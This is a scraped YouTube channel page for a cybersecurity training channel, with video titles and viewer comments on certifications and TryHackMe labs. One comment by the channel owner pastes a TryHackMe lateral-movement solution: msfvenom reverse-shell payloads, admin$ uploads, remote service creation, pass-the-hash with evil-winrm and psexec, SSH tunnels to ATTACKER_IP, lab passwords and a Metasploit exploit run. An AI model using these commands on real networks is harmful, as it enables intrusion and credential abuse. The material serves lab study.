Cybersecurity_meme_review_soc_2
14:17
9 сағат бұрын
THM Threat Modelling
37:36
14 сағат бұрын
THM LOG4J WALKTHROUGH
1:06:08
2 ай бұрын
Kali Linux CVE 2024 3094 Backdoor
1:35
THM Lateral Movement and Pivoting
2:38:05
Pivoting with Meterpreter 101
26:51
Kevin Mitnick Bio
1:57
5 ай бұрын
IT CERTIFICATION TIER LIST :)
11:37
HTB RETIRED ACTIVE
27:30
6 ай бұрын
TRYHACKME Governance & Regulation
25:41
Пікірлер
@Maja-fl1bz
@Maja-fl1bz 19 сағат бұрын
THE BEST GUIDE! THX I coudn't find good guide for setting up everything in thm because all of videos are for advancers. You are amazing <3 thank you again
@Alexi-pj4yb
@Alexi-pj4yb 2 күн бұрын
Thank you for this video ! I'm on a crunch for time and you helped me with my assignment for my cybersecurity class. Keep up the good work ! 🙌
@SKOBIDO19
@SKOBIDO19 3 күн бұрын
شكرا ل تعبك
@SKOBIDO19
@SKOBIDO19 3 күн бұрын
❤❤❤🎉😁🤍
@tommypham1101
@tommypham1101 5 күн бұрын
If I have comptia a, net, sec, CySA. Would wgu be worth it? Or should I just go the traditional route and go for an IT job and work my way up to cybersecurity, because money is tight for me tbh
@intothecodewithdanny5389
@intothecodewithdanny5389 5 күн бұрын
I recommend going the traditional route and developing experience. You could achieve these certs on the way and after 2-3 years get with an employer who would pay for your degree.
@tommypham1101
@tommypham1101 4 күн бұрын
@@intothecodewithdanny5389 thank you Danny 💯
@sybex200
@sybex200 9 күн бұрын
Is this course still free ? I doubt.
@intothecodewithdanny5389
@intothecodewithdanny5389 9 күн бұрын
It is just an intro course. The Pen 100 and 200 cost money tho.
@nightreaper1278
@nightreaper1278 4 күн бұрын
@@intothecodewithdanny5389 how do i access it for free it seems i need to sign up
@wx1113
@wx1113 13 күн бұрын
Thank you so much!
@Haribol-Haribol-108
@Haribol-Haribol-108 15 күн бұрын
It's now 2499 somthing. OSCP IS SUPER GREEDY
@priteshhacker1572
@priteshhacker1572 17 күн бұрын
Can i access my ejptv2 learning parth during the exam time.
@intothecodewithdanny5389
@intothecodewithdanny5389 16 күн бұрын
Yes
@priteshhacker1572
@priteshhacker1572 17 күн бұрын
Can i access my ejptv2 learning parth during the exam time.?😊
@user-mn6lm1lt7e
@user-mn6lm1lt7e 17 күн бұрын
Thanks for sharing this! useful for my eCCPT
@DaneStubblefield
@DaneStubblefield 18 күн бұрын
Thank you so much for this content. Where is the video mentioned in the end regarding GPOs? I've just stepped into my first Sys Admin role and looking to get some familiarity.
@khanzazai6479
@khanzazai6479 21 күн бұрын
Sir hwo to do this on the tryhackeme virtual machine it seems that you are working on your own machine and you have files to already but unfortunately i dont have the shell code file and folder on the attackbox
@joelprestonsmith
@joelprestonsmith Ай бұрын
Hmmm. You said you'd put a link in the description (regarding the Microsoft file we'd need), but I don't see it. If you'd post it, I'd be grateful. Thank you.
@intothecodewithdanny5389
@intothecodewithdanny5389 29 күн бұрын
It is the Microsoft Visual C++ link. learn.microsoft.com/en-us/cpp/windows/latest-supported-vc-redist?view=msvc-170#latest-microsoft-visual-c-redistributable-version
@scrollsung
@scrollsung Ай бұрын
let me stop procrastinating and get back to professor messer's videos
@shutdown199
@shutdown199 Ай бұрын
My Secuity + expired today and I applied for a grace period. Is there away for me to earned CEU's to be able to renew course or will I be forced to retest? Sorry for the question the proccess is just very confusing for me, and CompTIA sucks at explaining this stuff.
@zaidranger666
@zaidranger666 Ай бұрын
Ur a winner now
@tommypham1101
@tommypham1101 Ай бұрын
Would you recommend the ccsk?
@intothecodewithdanny5389
@intothecodewithdanny5389 Ай бұрын
I haven’t taken the ccsk. However, I think everyone should have some cloud knowledge. Personally, I would rather go for a vender specific cloud cert like AWS or Azure. Since most companies have a hybrid on-prem and cloud networks, I would pick Azure.
@tommypham1101
@tommypham1101 Ай бұрын
@@intothecodewithdanny5389 thank you Danny!
@HawK40x
@HawK40x Ай бұрын
in etc/passwd file the root is set to /nologin in the end what does that mean? I can never log into that machine? Btw it's an Huawei OPTICAL Terminal based on Busybox
@RockPaperCube
@RockPaperCube Ай бұрын
As an HR recruiter, here’s my tier list: S: CISSP A: CEH (Only if you have a CISSP) B: C: D: Master’s Degree F: OSCP, OSCE (isn’t that the OSCP?), CCNA, CASP, eCPPTv2, A+, Net+, Sec+, Bachelors degree, CEH (If no CISSP) Skill shortage btw
@t.l.c.withnisht4316
@t.l.c.withnisht4316 Ай бұрын
Are there any new free courses for renewal?
@intothecodewithdanny5389
@intothecodewithdanny5389 Ай бұрын
I haven’t checked in a while. They are starting to discontinue the free courses. Occasionally they will post some around August, but I recommend checking the portal.
@peezhead
@peezhead Ай бұрын
hey, did u forget to put the "Testing your Code" section or was it done on purpose?
@johnsonanthony3
@johnsonanthony3 Ай бұрын
Keep it up bro, big respect to the humbleness
@kenncutup
@kenncutup Ай бұрын
Should i be downloading Nessus on the Win10 VM or on my personal computer ?
@kenncutup
@kenncutup Ай бұрын
Lol disregard
@DeemAltwaijri
@DeemAltwaijri Ай бұрын
Hi I have a question, You said that the lap expired after an hour or two does it expired for the whole day after these two hours? or I can just run it again?
@raymus6544
@raymus6544 Ай бұрын
I have a question. Did you try to ping the client to server and vice versa?
@superkool7
@superkool7 Ай бұрын
Hey brother good stuff! Just out of curiosity, does anyone know if there is only ONE version of eJPT now? Haven’t seen a straight answer on that. Would really love to know! Thanks!
@Adivasi7777
@Adivasi7777 24 күн бұрын
Yup
@mgillanders
@mgillanders Ай бұрын
Just finishing up 23 and 24 and find it challenging, especially when I dont read the question slowly. Great video Cheers
@raymus6544
@raymus6544 Ай бұрын
This is great!
@Zachsnotboard
@Zachsnotboard Ай бұрын
Looking through all of your videos, exactly what I was looking for. Started the TCM peh course, hope to start pen 200 this year. I’m just confused how soon you have to take the test, do you have to do it once your class access is over ?
@intothecodewithdanny5389
@intothecodewithdanny5389 Ай бұрын
You could take it once you have access. You want to ensure you schedule it before your access is up. 3 months or 1 year depending on which sub you brought. Good look TCM’s course is good I did that before going for the eJPT.
@Zachsnotboard
@Zachsnotboard Ай бұрын
@@intothecodewithdanny5389 but like is there a time limit on when I have to take it ? Like can I wait two months after my course access is over ?
@dasskanal2343
@dasskanal2343 Ай бұрын
nice brother keep it up im on the same journey as you finished the course got medtech halfway in relia and halfway in the tj null list (2023) we will get there
@superjasim996
@superjasim996 2 ай бұрын
Thank you and god bless you for this tutorial. I have a couple of questions if you could please look into it: 1. So what you did in the video (by scanning the example stig benchmark file and opening it with Stig Viewer then fixing the vulnerabilities by using CMD) is that all what stigging & scapping for? Or are there different uses for the Stig & Scap programs? 2. Is there a job position in the IT field that basically ONLY requires the knowledge of using Stig and Scap? So basically all you gotta do in that job is scanning files for possible vulnerabilities and fixing them (like shown in the video) or you are still required to know and use more programs & solve different problems? I would much appreciate the answer & thank you very much
@intothecodewithdanny5389
@intothecodewithdanny5389 Ай бұрын
1.STIG is to ensure the system meets the minimum beachmarks for security. SCAP is an automated tool:way of ensuring the system meets the requirements.
@intothecodewithdanny5389
@intothecodewithdanny5389 Ай бұрын
2. Most cyber/system admin jobs will require you know about how go harden a system. It maybe with STIG /SCAP or some other regulation or set standards. However, STIG and SCAP is mainly seen in the government. PSI-DSS, etc have other requirements similar to the hardening requirements.
@tommypham1101
@tommypham1101 2 ай бұрын
Danny sooo lemme get this straight after you achieve god tier CISSP / CASP+... you pretty much gonna have to depend on CEU grinding to renew it? not much info out there so just curious
@intothecodewithdanny5389
@intothecodewithdanny5389 2 ай бұрын
Yes, but take in mind that CompTIA has a list of other god tier certs that will renew them. Aside from god tier certs you could just do some course on Cybrary, Udemy etc to only renew your highest level cert. Once you renew your highest cert all your lower level certs will get renewed as well automatically due to having renewed your highest level cert.
@SlugoC22
@SlugoC22 28 күн бұрын
So besides Cybary, Udemy and CBT nuggets.. are there any ways or sites that I can use to get CEUs for CASP+
@tommypham1101
@tommypham1101 2 ай бұрын
should i focus on the CASP aka securityX after my CySA+ or just go with the CISSP later down my career.... honestly the name securityX sound ridiculous
@intothecodewithdanny5389
@intothecodewithdanny5389 2 ай бұрын
I got both, but it depends on your budget. The CASP is less in demand outside the DOD/ military. However, it is cheaper and a little more technical. The CISSP is the gold standard and requires 4 year experience with a qualifying cert of 4 year degree in IT/cyber or 5 years of solid experience in IT/cyber. If you have the experience go for CISSP or do both.
@tommypham1101
@tommypham1101 2 ай бұрын
@@intothecodewithdanny5389 thank you Danny I’ll do my best to achieve it!
@xxr3gurgatation_nationxx295
@xxr3gurgatation_nationxx295 2 ай бұрын
Sex.exe.exe.exe.exe.expection
@null.ru.1337
@null.ru.1337 2 ай бұрын
good stuff, I was just looking for a way to do this. Worked like magic
@intothecodewithdanny5389
@intothecodewithdanny5389 2 ай бұрын
Glad it helped
@codermomo1792
@codermomo1792 2 ай бұрын
I can read myself by the way.
@tommypham1101
@tommypham1101 2 ай бұрын
thank you Danny, im wondering If my sec+ and getting the CySA+ will help me land even a soc 1 level job, beside that all i have are those and the google cyber cert, im also learning basic SOC/DFIR skills from LetsDefend website.... I don't know if thats enough and i keep putting doubt in my head that imma just end up in a help desk.
@RT-bt5ql
@RT-bt5ql 2 ай бұрын
very boring, other videos by others much better
@network-nub6687
@network-nub6687 2 ай бұрын
After getting 30 CE credits, do we need to click anything or will it automatically renew once our CCNA expires?
@intothecodewithdanny5389
@intothecodewithdanny5389 2 ай бұрын
Yes you need to go to your CE portal and input the course details. After a few days you will receive an email if those CEs are valid and you could view your CE count from your account.
@janetkangogo4105
@janetkangogo4105 2 ай бұрын
Great video
@intothecodewithdanny5389
@intothecodewithdanny5389 2 ай бұрын
Thank you for the support
@mikesdailygaming
@mikesdailygaming 2 ай бұрын
Ugh I'm a little disappointed, just got mine and it looks nothing like this. They changed from the nice looking font to like a basic "Calibri" one, looks cheap honestly
@intothecodewithdanny5389
@intothecodewithdanny5389 2 ай бұрын
o wow that is surprising
@user-zu4ft8yw9e
@user-zu4ft8yw9e 2 ай бұрын
The stages involved in resolving issues related to CVE-2023-4863 include: 1. Identification: Recognizing the vulnerability and understanding its impact. 2. Patching: Developing and releasing patches to address the vulnerability. 3. Communication: Informing users about the vulnerability and the available patches. 4. Implementation: Applying the patches to affected applications or programs. 5. Testing: Verifying that the patches are effective and do not cause any unintended issues. 6. Monitoring: Keeping track of any further developments related to the vulnerability. As for the question of how many applications or programs are affected by CVE-2023-4863, based on the provided information, the following applications are affected: - Microsoft Edge - Microsoft Teams for Desktop - Skype for Desktop - Webp Image Extensions These are the applications mentioned in the snippets as being impacted by CVE-2023-4863.
@intothecodewithdanny5389
@intothecodewithdanny5389 2 ай бұрын
thank you for the additional information :)
@polycapmuniu8494
@polycapmuniu8494 2 ай бұрын
Wow, what an eye-opening walkthrough! 👀 This video on Active Directory Basics provided a comprehensive introduction to the fundamental concepts and functionality of Active Directory. As a complete beginner, I found the explanations clear and easy to follow, making complex concepts seem much more approachable. Huge thanks to TryHackMe for providing such valuable resources for beginners like me to learn and grow in cybersecurity. Can't wait to dive deeper into this topic and expand my knowledge further! 🛡💻 #TryHackMe #ActiveDirectory #Cybersecurity
@intothecodewithdanny5389
@intothecodewithdanny5389 2 ай бұрын
Thank you for your feedback. Comments like this drive me to create more content. :)
@brettgastelum5330
@brettgastelum5330 2 ай бұрын
I guess no one posted a response to this and it's probably not worth mentioning anymore....... but the reason you were getting Access Denied was due to the folder not having write privileges.... I bashed my head on the table for the longest until I thought about it and remembered you mention in a previous video to ensure that whatever file it was had permission on it.
@intothecodewithdanny5389
@intothecodewithdanny5389 2 ай бұрын
You solved the mystery great job :D
@lucassimcic7520
@lucassimcic7520 3 ай бұрын
3) 25:00 4) 50:19 5) 1:11:50
@intothecodewithdanny5389
@intothecodewithdanny5389 3 ай бұрын
Thank you for the quick reference. I will try and shorten my videos by editing them.
@lucassimcic7520
@lucassimcic7520 3 ай бұрын
​@@intothecodewithdanny5389 in my humble opinion... try to read less and talk about the objective in every task and have all the code already in a clipboard, maybe that will shorten the video naturally. in my place of consumer, this is already a good video, so, ty for that
@intothecodewithdanny5389
@intothecodewithdanny5389 3 ай бұрын
msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=10.50.121.228 LPORT=4444 -o myservicekiller.exe smbclient -c 'put myservicekiller.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/' EZpass4ever runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools c64.exe -e cmd.exe 10.50.121.228 4443" sc.exe \\thmiis.za.tryhackme.com create THMservice-3233 binPath= "%windir%\myservicekiller.exe" start= auto sc.exe \\thmiis.za.tryhackme.com start THMservice-3233 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.50.121.228 LPORT=4445 -f msi > myinstallerkiller.msi smbclient -c 'put myinstallerkiller.msi' -U t1_corine.waters -W ZA '//thmiis.za.tryhackme.com/admin$/' Korine.1994 Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstallerkiller.msi"; Options = ""; AllUsers = $false} xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ssh za\\[email protected] Password: iLov3THM! evil-winrm -i 10.200.124.201 -u t1_toby.beck -H 533f1bd576caa912bdb9da284bbc60fe psexec.py -hashes 10.200.124.101 DOMAIN/t1_toby.beck@VICTIM_IP xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Username: t2_charlie.holland Password: Five2016 xfreerdp /v:thmjmp2.za.tryhackme.com /u:t2_charlie.holland /p:Five2016 ======================================== ssh za\\[email protected] xfreerdp /v:THMJMP2.za.tryhackme.com:13589 /u:t1_thomas.moore /p:MyPazzw3rd2020 ======================================= ssh tunneluser@ATTACKER_IP -R 8888:thmdc.za.tryhackme.com:80 -L *:6666:127.0.0.1:6666 -L *:7878:127.0.0.1:7878 -N systemctl enable ssh ssh [email protected] -R 8888:thmdc.za.tryhackme.com:80 -L *:6670:127.0.0.1:6670 -L *:7885:127.0.0.1:7885 -N systemctl enable ssh [*] Using exploit/windows/http/rejetto_hfs_exec msf6 exploit(windows/http/rejetto_hfs_exec) > set payload windows/shell_reverse_tcp payload => windows/shell_reverse_tcp msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.200.124.249***ip of **thmjmp2.za.tryhackme.com** lhost => thmjmp2.za.tryhackme.com msf6 exploit(windows/http/rejetto_hfs_exec) > set ReverseListenerBindAddress 127.0.0.1 ReverseListenerBindAddress => 127.0.0.1 msf6 exploit(windows/http/rejetto_hfs_exec) > set lport 7885 lport => 7885 msf6 exploit(windows/http/rejetto_hfs_exec) > set srvhost 127.0.0.1 srvhost => 127.0.0.1 msf6 exploit(windows/http/rejetto_hfs_exec) > set srvport 6666 srvport => 6666 msf6 exploit(windows/http/rejetto_hfs_exec) > set srvport 6670 3srvport => 6670 msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8888 rport => 8888 msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
@brettgastelum5330
@brettgastelum5330 3 ай бұрын
glibc_2.34 not found, I guess I'm too updated?
@satitpanya9709
@satitpanya9709 Ай бұрын
use gcc6 to compile or use bash on victim machine. bash is binary too
@nightwing09x
@nightwing09x 3 ай бұрын
100% agree with this ranking. As someone who has A+, Net+, Sec+, CCNA, CySA+, PenTest+, and am working on eJPT, eCPPT, CISSP.
@intothecodewithdanny5389
@intothecodewithdanny5389 3 ай бұрын
Nice you’re definitely on the right track. I just finished 90% of the Pen200 course for the OSCP. I kinda wish I had completed the eCPPT. I would have become more comfortable with exploiting larger networks.
@akel514
@akel514 3 ай бұрын
Great video man! Perfect explanation, works like a charm. Question from a beginner, how do you change the kali password permanently ?